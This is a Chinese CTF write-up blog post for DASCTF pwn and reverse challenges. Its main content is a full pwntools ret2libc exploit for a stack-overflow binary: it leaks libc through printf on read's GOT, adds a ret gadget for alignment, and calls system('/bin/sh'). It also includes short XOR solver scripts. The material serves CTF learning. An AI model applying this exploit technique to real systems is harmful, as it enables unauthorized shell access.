DASCTF安恒月赛-pwn

前言

开赛了,有点事情没打,晚上复现了一下。

echo-server

[*] '/ctf/work/ahys/echo server/test'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

程序很简单,经典栈溢出,rop利用即可。
但是因为是64位的,并且是glibc2.27,发现在做的时候构造rop链总是会cursh,
调试发现:

发现这段汇编直接会让程序cursh,想起来ex师傅一篇文章分析过,64位程序rop到system拿shell的时候也会这样。但是很奇怪这个也出现了,索性尝试一波。
解决办法:还是加个ret,让栈对其即可。

exp

from pwn import *
local_file  = './test'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.27.so'
remote_libc = './libc.so.6'
debug = 1
if debug:
    io = process(local_file)
    libc = ELF(local_libc)
else:
    # io = remote('node3.buuoj.cn',25390)
    libc = ELF(remote_libc)

elf = ELF(local_file)
libc = elf.libc
context.log_level = 'debug'
context.arch = elf.arch
context.terminal = ['tmux','splitw','-h']#,'neww'

s      = lambda data               :io.send(data) 
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
sea     = lambda delim,data         :io.sendafter(delim, data)
r      = lambda numb=4096          :io.recv(numb)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :io.info(tag + ': {:#x}'.format(addr))
itr     = lambda                    :io.interactive()
def dbg():
    # gdb.attach(proc.pidof(io)[0],gdbscript="b main")
    gdb.attach(io)
    pause()
pop_rdi = 0x0000000000400823# : pop rdi ; ret
offset = 136
start = 0x4005C0
ret = 0x0400768
sla('how long is your name:','500')
payload = '\x00' * offset + flat([ret,pop_rdi,elf.got['read'],elf.plt['printf'],start])
# dbg()
sla('s you name?',payload)
ru('hello ')
read = uu64(r(6))
info_addr('printf',read)
libc_base = read - libc.symbols['read']
info_addr('libc_base',libc_base)
binsh = libc_base  + libc.search("/bin/sh").next()
system = libc_base + libc.sym['system']
sla('how long is your name: ','500')
payload = '\x00' * offset + flat([ret,pop_rdi,binsh,system])
# rec = 0x4f322 + libc_base
# dbg()
sla('s you name?',payload)
itr()

入门reverse

s = 'akhb~chdaZrdaZudqduvdZvvv|'
flag = ''
for i in range(26):
    flag += chr((ord(s[i]) - 1) ^ 6)

print(flag)

Encrypts

直接爆破了。

s = [38,44,33,39,59,35,34,115,117,114,113,33,36,117,118,119,35,120,38,114,117,113,38,34,113,114,117,114,36,112,115,118,121,112,35,37,121,61]

for i in range(128):
    flag = ''
    for j in range(38):
        flag += chr(s[j] ^ i)
    if flag[:4] == 'flag':
        print(flag)


re pwn rop uaf

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!